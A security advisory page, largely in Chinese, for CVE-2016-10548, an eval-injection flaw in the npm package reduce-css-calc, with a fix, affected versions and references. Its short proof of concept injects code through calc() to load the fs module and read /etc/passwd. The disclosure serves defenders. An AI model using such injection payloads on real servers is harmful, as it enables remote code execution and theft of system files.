CVE-2016-10548

描述

Affected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server. ## Proof of Concept ``` const reduceCSSCalc = require('reduce-css-calc'); console.log(reduceCSSCalc(`calc( (Buffer(10000)))`)); console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`)); console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`)); ``` ## Recommendation Update to version 1.2.5 or later.

如何修補 CVE-2016-10548

要修補 CVE-2016-10548,請將受影響套件升級到下列已修補版本。

• —升級至 1.2.5 或更新版本

CVE-2016-10548 正在被利用嗎?

低 — EPSS 為 0.4%,目前沒有觀察到大規模利用活動。

受影響套件(1)

• from 0, < 1.2.5

參考連結(4)

• ADVISORYgithub.com/advisories/GHSA-4662-j96g-mv46
• ADVISORYnvd.nist.gov/vuln/detail/CVE-2016-10548
• WEBgist.github.com/ChALkeR/415a41b561ebea9b341efbb40b802fc9
• WEBwww.npmjs.com/advisories/144